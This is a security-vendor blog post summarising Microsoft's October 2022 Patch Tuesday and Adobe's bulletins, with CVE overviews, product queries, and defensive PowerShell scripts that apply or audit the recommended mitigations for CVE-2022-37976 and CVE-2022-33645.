October 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities with 13 Critical, plus 12 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 29 Vulnerabilities with 17 Critical.
* * *
# **Microsoft Patch Tuesday Summary**
Microsoft has fixed 84 vulnerabilities (aka flaws) in the October 2022 update, including 13 vulnerabilities classified as **_Critical_** as they allow Elevation of Privilege (EoP), Remote Code Execution (RCE), and Spoofing. This month's Patch Tuesday fixes two (2) zero-day vulnerabilities ([CVE-2022-41033](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>) and [CVE-2022-41043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41043>)), with one (1) of them, CVE-2022-41033, actively exploited in attacks. Earlier this month, on October 3 and 6, 2022, Microsoft also released a total of 12 Microsoft Edge (Chromium-Based) updates, one (1) addressing Spoofing ([CVE-2022-41035](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41035>)) ranked _**Moderate**_.
Microsoft has fixed flaws across the following categories: Denial of Service (DoS), Elevation of Privilege (EoP), Information Disclosure, Remote Code Execution (RCE), Security Feature Bypass, Spoofing, Microsoft Edge (Chromium-based), and Microsoft Edge (Chromium-based) / Spoofing.
# Microsoft Exchange _"**ProxyNotShell**"_ Zero-Days Not Yet Addressed _(QID 50122)_
Unfortunately, Microsoft has not released security updates to address **_ProxyNotShell_** which includes [two actively exploited zero-day vulnerabilities](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/30/qualys-response-to-proxynotshell-microsoft-exchange-server-zero-day-threat-using-qualys-platform>) tracked as [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>).
[Released: October 2022 Exchange Server Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-october-2022-exchange-server-security-updates/ba-p/3646263>) provides the following update:
> **NOTE** The October 2022 SUs **_do not_** contain fixes for the zero-day vulnerabilities reported publicly on September 29, 2022 (CVE-2022-41040 and CVE-2022-41082). Please [see this blog post](<https://techcommunity.microsoft.com/t5/exchange-team-blog/customer-guidance-for-reported-zero-day-vulnerabilities-in/ba-p/3641494>) to apply mitigations for those vulnerabilities. We will release updates for CVE-2022-41040 and CVE-2022-41082 when they are ready.
[Ankit Malhotra](<https://blog.qualys.com/author/amalhotra>), Manager, Signature Engineering suggests, "It's worth noting that Microsoft has had to revise the mitigation for [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) more than once, as the suggested URL rewrite Mitigation was bypassed multiple times. Organizations that reacted to the ProxyShell vulnerability should also pay close attention to this, taking their lessons learned on rapid remediation, as this vulnerability can potentially see increased exploitation."
* * *
**[ProxyNotShell: Microsoft Exchange Server Zero-Day Threat Using Qualys VMDR](<https://tinyl.io/79AH>)** | [QUALYS ON-DEMAND WEBINAR](<https://tinyl.io/7A58>)
[Watch Now](<https://tinyl.io/79AH>)
[**Qualys Response to _ProxyNotShell_ Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform**](<https://tinyl.io/79AJ>) | [QUALYS BLOG](<https://blog.qualys.com/?>)
* * *
## **The October 2022 Microsoft Vulnerabilities are classified as follows:**
[Microsoft Exploitability Index](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>) / [Microsoft Security Update Severity Rating System](<https://www.microsoft.com/en-us/msrc/security-update-severity-rating-system>)
* * *
## **Two (2) Zero-Day Vulnerabilities Addressed**
A vulnerability is classified as a **_zero-day_** if it is publicly disclosed or actively exploited with no official fix available.
### [CVE-2022-41033](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>) | Windows COM+ Event System Service Elevation of Privilege (EoP) Vulnerability
This vulnerability has a CVSSv3.1 score of 7.8/10.
Classified as **_Critical_**, this issue affects an unknown function of the component COM+ Event System Service. The impact of exploitation is loss of confidentiality, integrity, and availability.
Microsoft has not disclosed how the vulnerability is being exploited or if it is being exploited in targeted or more widespread attacks. They only say that the attack complexity is low and that it requires no user interaction for the attacker to be able to achieve SYSTEM privileges.
An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.
Patch Installation should be considered **_Critical_**.
[Saeed Abbasi](<https://blog.qualys.com/author/sabbasi>), Manager, Vulnerability Signatures adds, "This patch fixes a security vulnerability that Microsoft stated is under active attack. However, it is not clear how severe these attacks are. Due to the nature of this vulnerability, a privilege escalation that often engages some social engineering (e.g. requiring the user to open a malicious attachment), history shows that it potentially needs to be chained with a code execution bug to exploit."
[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**
* * *
### [CVE-2022-41043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41043>) | Microsoft Office Information Disclosure Vulnerability
This vulnerability has a CVSSv3.1 score of 3.3/10.
The type of information that could be disclosed if an attacker successfully exploited this vulnerability is user tokens and other potentially sensitive information. The impact of exploitation is loss of confidentiality.
This vulnerability demands that the victim is doing some kind of user interaction. As of the time of publishing, neither technical details nor an exploit is publicly available.
[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): _**Exploitation Less Likely**_
* * *
## **Microsoft Critical Vulnerability Highlights**
### [CVE-2022-37968](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37968>) | Azure Arc-enabled Kubernetes cluster Connect Elevation of Privilege (EoP) Vulnerability
This vulnerability has a CVSSv3.1 score of 10/10.
Microsoft has identified a vulnerability affecting the cluster connect feature of Azure Arc-enabled Kubernetes clusters. This vulnerability could allow an unauthenticated user to elevate their privileges and potentially gain administrative control over the Kubernetes cluster. Additionally, because Azure Stack Edge allows customers to deploy Kubernetes workloads on their devices via Azure Arc, Azure Stack Edge devices are also vulnerable to this vulnerability.
Customers using Azure Stack Edge must update to the 2209 release (software version 2.2.2088.5593). Release notes for the 2209 release of Azure Stack Edge can be found here: [Azure Stack Edge 2209 release notes](<https://learn.microsoft.com/en-us/azure/databox-online/azure-stack-edge-gpu-2209-release-notes>).
[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**
* * *
### [CVE-2022-37976](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>) | Active Directory Certificate Services Elevation of Privilege (EoP) Vulnerability
This vulnerability has a CVSSv3.1 score of 8.8/10.
A malicious DCOM client could coerce a DCOM server to authenticate to it through the Active Directory Certificate Service (ADCS) and use the credential to launch a cross-protocol attack.
An attacker who successfully exploited this vulnerability could gain domain administrator privileges.
[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**
* * *
### [CVE-2022-41038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41038>) | Microsoft SharePoint Server Remote Code Execution (RCE) Vulnerability
This vulnerability has a CVSSv3.1 score of 8.8/10.
In a network-based attack, an authenticated attacker with Manage List permissions could execute code remotely on the SharePoint Server.
The attacker must be authenticated to the target site, with permission to use Manage Lists within SharePoint.
**NOTE**: Customers running SharePoint Server 2013 Service Pack 1 can install the cumulative update or the security update, which is the same update as for Foundation Server 2013.
[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**
* * *
### [CVE-2022-38048](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38048>) | Microsoft Office Remote Code Execution (RCE) Vulnerability
This vulnerability has a CVSSv3.1 score of 7.8/10.
The word **_Remote_** in the title refers to the location of the attacker. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE). The attack itself is carried out locally.
When a particular vulnerability allows an attacker to execute "arbitrary code", it typically means that the bad guy can run any command on the target system the attacker chooses. [_Source_](<https://tinyl.io/7A6M>)
For example, when the score indicates that the _Attack Vector_ is _Local_ and _User Interaction_ is _Required_, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer. The impact of exploitation is loss of confidentiality, integrity, and availability.
**NOTE**: Customers should apply all updates offered for the software installed on their systems. If multiple updates apply, they can be installed in any order.
[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**
* * *
### [CVE-2022-34689](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34689>) | Windows CryptoAPI Spoofing Vulnerability
This vulnerability has a CVSSv3.1 score of 7.5/10.
An attacker could manipulate an existing public X.509 certificate to spoof their identity and perform actions such as authentication or code signing as the targeted certificate.
The technical details are unknown, and an exploit is not publicly available. The impact is known to affect integrity.
[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**
* * *
## **Microsoft Release Summary**
This month’s [Release Notes](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct>) cover multiple Microsoft product families, including Azure, Browser, Developer Tools, Extended Security Updates [(ESU)](<https://docs.microsoft.com/en-us/lifecycle/faq/extended-security-updates>), Microsoft Office, System Center, and Windows.
A total of 78 unique Microsoft products/versions are affected, including but not limited to .NET and .NET Core, Azure Arc-enabled Kubernetes cluster, Azure Service Fabric Explorer, Azure Stack Edge, Azure StorSimple 8000 Series, Jupyter Extension for Visual Studio Code, Microsoft 365 Apps for Enterprise, Microsoft Edge (Chromium-based), Microsoft Malware Protection Engine, Microsoft Office, Microsoft SharePoint Enterprise Server, Microsoft SharePoint Foundation, Microsoft SharePoint Server, Microsoft Visual Studio, Visual Studio and Visual Studio Code, Windows Desktop, and Windows Server.
Downloads include Cumulative Updates, Monthly Rollups, Security Only, and Security Updates.
* * *
## **Microsoft Edge | Last But Not Least**
Earlier in October 2022, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities including [CVE-2022-41035](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41035>). The vulnerability assigned to the CVE is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. For more information, please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>).
### [CVE-2022-41035](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41035>) | Microsoft Edge (Chromium-based) Spoofing Vulnerability
This vulnerability has a CVSSv3.1 score of 8.3/10.
In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file.
[Per Microsoft severity guidelines](<https://www.microsoft.com/en-us/msrc/bounty-new-edge>), the amount of user interaction or preconditions required to allow this sort of exploitation downgraded the severity. The CVSS scoring system doesn't allow for this type of nuance. **Severity: _Moderate_**
[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**
* * *
_Did you know? Microsoft Security Response Center (MSRC) | [Improvements in Security Update Notifications Delivery – And a New Delivery Method](<https://tinyl.io/7A6i>)_
* * *
# **Adobe Security Bulletins and Advisories**
Adobe released four (4) [security bulletins and advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 29 vulnerabilities affecting Adobe ColdFusion, Adobe Reader, Adobe Commerce, and Adobe Dimension applications. Of these 29 vulnerabilities, 17 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, ten (10) are rated as Important and two (2) are rated as **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 4.4/10 to 10/10, as summarized below.

* * *
### [APSB22-42](<https://helpx.adobe.com/security/products/coldfusion/apsb22-44.html>) | Security updates available for Adobe ColdFusion
This update resolves six (6) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, six (6) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and one (1) **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerabilities.
_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_
Adobe has released security updates for ColdFusion versions 2021 and 2018. These updates resolve [Critical](<https://helpx.adobe.com/security/severity-ratings.html>), [Important](<https://helpx.adobe.com/security/severity-ratings.html>), and [Moderate](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities that could lead to arbitrary code execution, arbitrary file system write, security feature bypass, and privilege escalation.
* * *
### [APSB22-46](<https://helpx.adobe.com/security/products/acrobat/apsb22-46.html>) | Security update available for Adobe Acrobat and Reader
This update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerabilities.
_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_
Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to application denial-of-service and memory leak.
* * *
### [APSB22-48](<https://helpx.adobe.com/security/products/magento/apsb22-48.html>) | Security update available for Adobe Commerce
This update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerabilities.
_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_
Adobe has released a security update for Adobe Commerce and Magento Open Source. This update resolves a [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability. Successful exploitation could lead to arbitrary code execution.
* * *
### [APSB22-57](<https://helpx.adobe.com/security/products/dimension/apsb22-57.html>) | Security updates available for Adobe Dimension
This update resolves eight (8) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and one (1) **_[Moderate](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerability.
_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_
Adobe has released an update for Adobe Dimension. This update addresses [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [moderate](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak in the context of the current user.
* * *
# **About Qualys Patch Tuesday**
Qualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.
* * *
## Qualys Threat Research Blog Posts **_New_**
Published in the Last 30 days; Most Recent First
* [NSA Alert: Topmost CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors](<https://tinyl.io/79AX>)
* [Qualys Response to ProxyNotShell Microsoft Exchange Server Zero-Day Threat Using Qualys Cloud Platform](<https://tinyl.io/79Aa>)
* * *
## **Qualys [Threat Protection](<https://www.qualys.com/apps/threat-protection/>) High-Rated Advisories**
Published between September 14 - October 12, 2022, Most Recent First
* [Microsoft Patch Tuesday, October 2022 Edition: 84 Vulnerabilities patched including 12 Microsoft Edge (Chromium-Based), 2 Zero-days, and 13 Rated as Critical](<https://tinyl.io/79Vx>)
* [Zimbra Collaboration Suite Remote Code Execution Vulnerability (CVE-2022-41352)](<https://tinyl.io/797N>)
* [FortiGate and FortiProxy Authentication Bypass Vulnerability on Administrative Interface (HTTP/HTTPS) (CVE-2022-40684)](<https://tinyl.io/797M>)
* [Microsoft Exchange Server Zero-day Vulnerabilities (CVE-2022-41040 and CVE-2022-41082) (ProxyNotShell)](<https://tinyl.io/797L>)
* [Sophos Firewall Remote Code Execution Vulnerability (CVE-2022-3236)](<https://tinyl.io/797K>)
* [Zoho ManageEngine PAM360, Access Manager Plus, and Password Manager Pro Remote Code Execution Vulnerability (CVE-2022-35405)](<https://tinyl.io/797J>)
* [Trend Micro Patches Multiple Vulnerabilities in Apex One (On-Premise) Including One Zero-day (CVE-2022-40139)](<https://tinyl.io/797I>)
* [Cisco Patched Multiple Vulnerabilities in Multiple Products including NVIDIA Data Plane Development Kit](<https://tinyl.io/797H>)
* [Apple Patches Multiple Vulnerabilities in macOS Big Sur and macOS Monterey including One Zero-day (CVE-2022-32894)](<https://tinyl.io/797G>)
* [Microsoft Patches Vulnerabilities 79 including 16 Microsoft Edge (Chromium-Based); with 2 Zero-days and 5 Critical in Patch Tuesday, September 2022 Edition](<https://threatprotect.qualys.com/2022/09/14/microsoft-patches-vulnerabilities-79-including-16-microsoft-edge-chromium-based-with-2-zero-days-and-5-critical-in-patch-tuesday-september-2022-edition/>)
* * *
# **Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) (VMDR)**
Qualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB).
You can see all your impacted hosts by these vulnerabilities using the following QQL query:
```
vulnerabilities.vulnerability:( qid:`91949` OR qid:`91950` OR qid:`91951` OR qid:`91953` OR qid:`110417` OR qid:`110418` OR qid:`377627` OR qid:`377628` )
```

* [In-Depth Look Into Data-Driven Science Behind Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>) **_New_**
* [Qualys VMDR Recognized as Best VM Solution by SC Awards 2022 & Leader by GigaOm](<https://blog.qualys.com/product-tech/2022/08/22/qualys-vmdr-recognized-as-best-vm-solution-by-sc-awards-2022-leader-by-gigaom>)
* [A Deep Dive into VMDR 2.0 with Qualys TruRisk™](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>)
* * *
# **Rapid Response with [Patch Management](<https://www.qualys.com/apps/patch-management/>) (PM)**
VMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the “Missing” patches to identify and deploy the applicable, available patches with one click.
The following QQL will return the missing patches for this Patch Tuesday:
```
( qid:`91949` OR qid:`91950` OR qid:`91951` OR qid:`91953` OR qid:`110417` OR qid:`110418` OR qid:`377627` OR qid:`377628` )
```

* [Why Organizations Struggle with Patch Management (and What to Do about It)](<https://tinyl.io/79TY>) **_New_**
* [Let Smart Automation Reduce the Risk of Zero-Day Attacks on Third-Party Applications](<https://blog.qualys.com/qualys-insights/2022/09/08/let-smart-automation-reduce-the-risk-of-zero-day-attacks-on-third-party-applications-2>)
* [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)
* * *
# EXECUTE Mitigation Using [Custom Assessment and Remediation](<https://tinyl.io/79UY>) (CAR) **_New_**
[Qualys Custom Assessment and Remediation](<https://www.qualys.com/apps/custom-assessment-remediation/>) empowers a system administrator to quickly and easily perform configuration updates on your technology infrastructure when the current situation requires the implementation of a vendor-suggested mitigation or workaround.
**_Mitigation_** refers to a setting, common configuration, or general best practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability.
A **_workaround_** is a method, sometimes used temporarily, for achieving a task or goal when the usual or planned method isn't working. Information technology often uses a workaround to overcome hardware, programming, or communication problems. Once a problem is fixed, a workaround is usually abandoned. [_Source_](<https://www.techtarget.com/whatis/definition/workaround>)
## Try It for Free!
[Sign up now for a no-cost trial of Qualys Custom Assessment and Remediation](<https://www.qualys.com/forms/custom-assessment-remediation/>)
Customers can perform the provided mitigation steps by creating a PowerShell script and executing the script on vulnerable assets.
**IMPORTANT:** Scripts tend to change over time. Referring back to a portion of our quote from [Ankit Malhotra](<https://blog.qualys.com/author/amalhotra>) at the top of this blog, "It's worth noting that Microsoft has had to revise the mitigation for [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) more than once, as the suggested URL rewrite Mitigation was bypassed multiple times." **_Please refer to the Qualys GitHub Tuesday Patch [link](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Tuesday%20Patch>) to ensure the most current version of a given [Patch Tuesday script](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Tuesday%20Patch>) is in use._**
### Related Blog Content:
Published in the Last 30 days; Most Recent First
* [Zimbra Collaboration Suite Remote Code Execution Vulnerability (CVE-2022-41352)](<https://tinyl.io/797N>)
* [Remediate Your Vulnerable Lenovo Systems with Qualys Custom Assessment and Remediation](<https://tinyl.io/79Y9>)
### [**CVE-2022-37976**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>) | Active Directory Certificate Services Elevation of Privilege (EoP) Vulnerability
This vulnerability has a CVSSv3.1 score of 8.8/10.
[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**
[**GitHub Link for CVE-2022-37976 Script**](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Tuesday%20Patch/2022/October/CVE-2022-37976\(ADCS%20Vulnerability\)>)
```powershell
# Mitigation for CVE-2022-37976 (ADCS EoP): raise the DCOM LegacyAuthenticationLevel to 5
# (packet integrity) on hosts where Active Directory Certificate Services is running.
$ServiceName = "CertSvc"
# SilentlyContinue: hosts without ADCS installed fall through to the "not running" branch
$ServiceStatus = (Get-Service -Name $ServiceName -ErrorAction SilentlyContinue).Status
if ($ServiceStatus -eq "Running")
{
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole" /v LegacyAuthenticationLevel /t REG_DWORD /d 5 /f | Out-Null
    # reg.exe is a native command, so check its exit code rather than $? (which reflects Out-Null)
    if ($LASTEXITCODE -eq 0)
    {
        Write-Host "ADCS found running. LegacyAuthenticationLevel is set to 5. Mitigation for CVE-2022-37976 has been applied as per MSRC guidelines."
    }
    else
    {
        Write-Host "command failed"
    }
}
else
{
    Write-Host "ADCS not running. No action required"
}
```

* * *
### [CVE-2022-33645](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33645>) | Windows TCP/IP Driver Denial of Service (DoS) Vulnerability
This vulnerability has a CVSSv3.1 score of 7.5/10.
[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**
[**GitHub Link for CVE-2022-33645 Script**](<https://github.com/Qualys/Custom-Assessment-and-Remediation-Script-Library/tree/main/Tuesday%20Patch/2022/October/CVE-2022-33645\(TCPIP%20Driver%20Dos%20Vulnerability\)>)
```powershell
# Workaround for CVE-2022-33645 (TCP/IP driver DoS): unbind IPv6 (ms_tcpip6) from every network adapter.
# This removes IPv6 connectivity host-wide; re-enable with Enable-NetAdapterBinding once the patch is installed.
Disable-NetAdapterBinding -Name "*" -ComponentID "ms_tcpip6"
if ($?)
{
    Write-Host "IPv6 has been disabled as part of workaround implementation. CVE-2022-33645 is now mitigated."
}
else
{
    Write-Host "command failed"
}
```

* * *
# **EVALUATE Vendor-Suggested Mitigation with [Policy Compliance](<https://www.qualys.com/forms/policy-compliance/>) (PC)**
[Qualys Policy Compliance Control Library](<https://vimeo.com/700790353>) makes it easy to evaluate your technology infrastructure when the current situation requires implementation validation of a vendor-suggested mitigation or workaround.
**_Mitigation_** refers to a setting, common configuration, or general best practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability.
A **_workaround_** is a method, sometimes used temporarily, for achieving a task or goal when the usual or planned method isn't working. Information technology often uses a workaround to overcome hardware, programming, or communication problems. Once a problem is fixed, a workaround is usually abandoned. [_Source_](<https://www.techtarget.com/whatis/definition/workaround>)
The following [Qualys Policy Compliance Control IDs (CIDs) and System Defined Controls (SDC)](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/module_pc/controls/controls_lp.htm>) have been updated to support Microsoft recommended mitigation(s) for this Patch Tuesday:
### [**CVE-2022-37976**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>) | Active Directory Certificate Services Elevation of Privilege (EoP) Vulnerability
This vulnerability has a CVSSv3.1 score of 8.8/10.
Policy Compliance Control IDs (CIDs):
* **4079** Status of the 'Active Directory Certificate Service'
* **14916** Status of Windows Services
* **24842** Status of the 'LegacyAuthenticationLevel' setting
[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**
* * *
### [CVE-2022-33645](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33645>) | Windows TCP/IP Driver Denial of Service (DoS) Vulnerability
This vulnerability has a CVSSv3.1 score of 7.5/10.
Policy Compliance Control IDs (CIDs):
* **4842** Status of the 'Internet Protocol version 6 (IPv6) components' setting
[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**
* * *
The following QQL will return a posture assessment for the CIDs for this Patch Tuesday:
```
control:( id:`4079` OR id:`4842` OR id:`14916` OR id:`24842` )
```
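For teams that want a local read-only check of the same posture the CIDs above assess, the following PowerShell script is an added example (not the page's own script and not a Qualys control): it reports whether the CVE-2022-37976 and CVE-2022-33645 mitigations are present without changing anything. It assumes the registry location and expected value (5) for LegacyAuthenticationLevel from the CVE-2022-37976 script above, and relies on the built-in NetAdapter module for the IPv6 binding check.

```powershell
# Added example: audit the two Microsoft-recommended mitigations from this Patch Tuesday.
# Assumptions: HKLM\SOFTWARE\Microsoft\Ole\LegacyAuthenticationLevel = 5 is the expected
# state (taken from the CVE-2022-37976 script above); Get-NetAdapterBinding is available.

function Get-AdcsLegacyAuthPosture {
    # CVE-2022-37976: the mitigation only applies to hosts running
    # Active Directory Certificate Services (service name CertSvc).
    $check = 'CVE-2022-37976 LegacyAuthenticationLevel'
    $svc = Get-Service -Name 'CertSvc' -ErrorAction SilentlyContinue
    if ($null -eq $svc -or $svc.Status -ne 'Running') {
        return [pscustomobject]@{ Check = $check; Status = 'NotApplicable'
                                  Detail = 'CertSvc not installed or not running' }
    }

    # Read the DCOM authentication floor; a missing value means the default is in force.
    $props = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Ole' `
                              -Name 'LegacyAuthenticationLevel' -ErrorAction SilentlyContinue
    $level = $props.LegacyAuthenticationLevel

    if ($null -eq $level) {
        $status = 'Fail'; $detail = 'LegacyAuthenticationLevel is not set (mitigation not applied)'
    }
    elseif ([int]$level -ge 5) {
        # 5 = packet integrity (the value used by the mitigation script); 6 = packet privacy is stricter.
        $status = 'Pass'; $detail = "LegacyAuthenticationLevel = $level"
    }
    else {
        $status = 'Fail'; $detail = "LegacyAuthenticationLevel = $level (expected 5)"
    }
    return [pscustomobject]@{ Check = $check; Status = $status; Detail = $detail }
}

function Get-Ipv6BindingPosture {
    # CVE-2022-33645 workaround: the page's script unbinds ms_tcpip6 from every
    # adapter, so any adapter where the binding is still enabled is a gap.
    $check = 'CVE-2022-33645 IPv6 (ms_tcpip6) binding'
    $bindings = @(Get-NetAdapterBinding -ComponentID 'ms_tcpip6' -ErrorAction SilentlyContinue)
    if ($bindings.Count -eq 0) {
        return [pscustomobject]@{ Check = $check; Status = 'NotApplicable'
                                  Detail = 'No ms_tcpip6 binding found on any adapter' }
    }
    $stillEnabled = @($bindings | Where-Object { $_.Enabled } | Select-Object -ExpandProperty Name)
    if ($stillEnabled.Count -eq 0) {
        return [pscustomobject]@{ Check = $check; Status = 'Pass'
                                  Detail = "IPv6 unbound on all $($bindings.Count) adapter(s)" }
    }
    return [pscustomobject]@{ Check = $check; Status = 'Fail'
                              Detail = "IPv6 still bound on: $($stillEnabled -join ', ')" }
}

# Collect both checks, print a posture table, and exit non-zero if anything failed
# so a job runner or scheduler can flag the host for follow-up.
$results = @(Get-AdcsLegacyAuthPosture; Get-Ipv6BindingPosture)
$results | Format-Table -AutoSize
if ($results.Status -contains 'Fail') { exit 1 }
```

Run it in an elevated PowerShell session; a `NotApplicable` row for the ADCS check is the expected result on hosts that are not certificate authorities.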

* [Prepare Your Organization for Compliance with the NYDFS Cybersecurity Regulation](<https://tinyl.io/79U7>) **_New_**
* [Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/23/mitigating-the-risk-of-zero-day-vulnerabilities-by-using-compensating-controls>)
* [Policy Compliance (PC) | Policy Library Update Blogs](<https://notifications.qualys.com/tag/policy-library>)
* * *
**Patch Tuesday is Complete.**
* * *
# [This Month in Vulnerabilities and Patches](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>) Webinar Series
[Subscribe Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)
The Qualys Product Management and Threat Research team members host a monthly webinar series to help our existing customers leverage the seamless integration between [Qualys Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities.
During the webcast, this month’s Patch Tuesday high-impact vulnerabilities will be discussed. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management.
* * *
# UPCOMING EVENTS
* * *
The content within this section will spotlight upcoming Vulnerability Management, Patch Management, Threat Protection, Custom Assessment and Remediation, and Policy Compliance adjacent events available to our prospective, new, and existing customers.
## [**WEBINARS**](<https://gateway.on24.com/wcc/eh/3347108/category/91385/upcoming-webinars>)
## Introducing Qualys Workshop Wednesday
